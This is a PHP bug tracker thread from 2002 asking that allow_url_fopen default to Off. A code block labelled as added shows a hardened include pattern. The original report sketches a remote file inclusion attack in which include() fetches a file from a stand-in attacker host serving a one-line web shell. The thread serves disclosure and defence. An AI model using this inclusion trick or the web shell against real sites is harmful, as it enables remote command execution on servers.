ID: 21085
User updated by: [EMAIL PROTECTED]
Reported By: [EMAIL PROTECTED]
Status: Bogus
Bug Type: Unknown/Other Function
Operating System: ALL
PHP Version: 4.3.0RC3

New Comment:
Agreed. However, we live in a world where people aren't reading every single piece of every single package they install. Sure, anyone can shoot themselves in the foot. Sure, you can code poorly. But should this particular "feature" be on by default instead of turned on? If they turn it on, they know what they're doing. If they just drop the packages in... well, why make it easy to exploit? (Case in point - a friend of mine who's not a total newbie got hacked this way.) IMHO, the default package should be as "dummy proof" as possible and able to be opened up from there. However, it's not up to me.

-Mike

Previous Comments:
------------------------------------------------------------------------

[2002-12-18 15:41:09] [EMAIL PROTECTED]

It's really up to the user to validate input from the outside. You can always shoot yourself in the foot if you want to. There is no valid reason to change this default.

------------------------------------------------------------------------

[2002-12-18 15:34:31] [EMAIL PROTECTED]

PHP by default allows include() calls which contain URL/URI strings.

    register_globals=on
    include("$somevar/file.php"); // real site code

Exploit by overriding $somevar to http://badsite.evilcode.com where file.php is

    <?php system($cmd); ?>

This causes the "real site" to execute the $cmd command passed in on the URL/URI string.

Requesting that allow_url_fopen be set to "Off" for future releases and a documentation note made about the caveat.

-Mike

------------------------------------------------------------------------

-- 
Edit this bug report at http://bugs.php.net/?id=21085&edit=1
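As an added example (not part of the bug report or of PHP itself), the include pattern described in the report placed beside a hardened form that does not rely on the php.ini defaults under discussion. The ./pages directory and the page names in the allowlist are assumed.

```php
<?php
// Added example, not code from the bug report. Assumes page files live
// under the hypothetical directory ./pages next to this script.
declare(strict_types=1);

// Vulnerable shape from the report: the include path is built from data the
// request controls. With register_globals=on, $somevar is filled straight
// from the query string; with allow_url_fopen=on, a URL value makes include()
// fetch and execute a remote file.
function vulnerable_include(string $somevar): void
{
    include "$somevar/file.php";
}

// Hardened shape: never derive a filesystem path from input. Map a short key
// to a fixed allowlist and refuse anything that is not an exact match.
// Independently of this code, php.ini should carry register_globals=Off,
// allow_url_fopen=Off and allow_url_include=Off for the defence in depth
// the report asks for.
const PAGE_MAP = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

function resolve_page(string $requested): ?string
{
    if (!array_key_exists($requested, PAGE_MAP)) {
        return null;            // unknown key: do not guess, do not include
    }
    $base = realpath(__DIR__ . '/pages');
    $path = realpath($base . '/' . PAGE_MAP[$requested]);
    // realpath() returns false for a missing file and resolves symlinks and
    // "..", so a final prefix check keeps the include inside ./pages.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter from the explicit superglobal rather than relying on
// register_globals, and fail closed on anything outside the allowlist.
$page = resolve_page($_GET['page'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page;
```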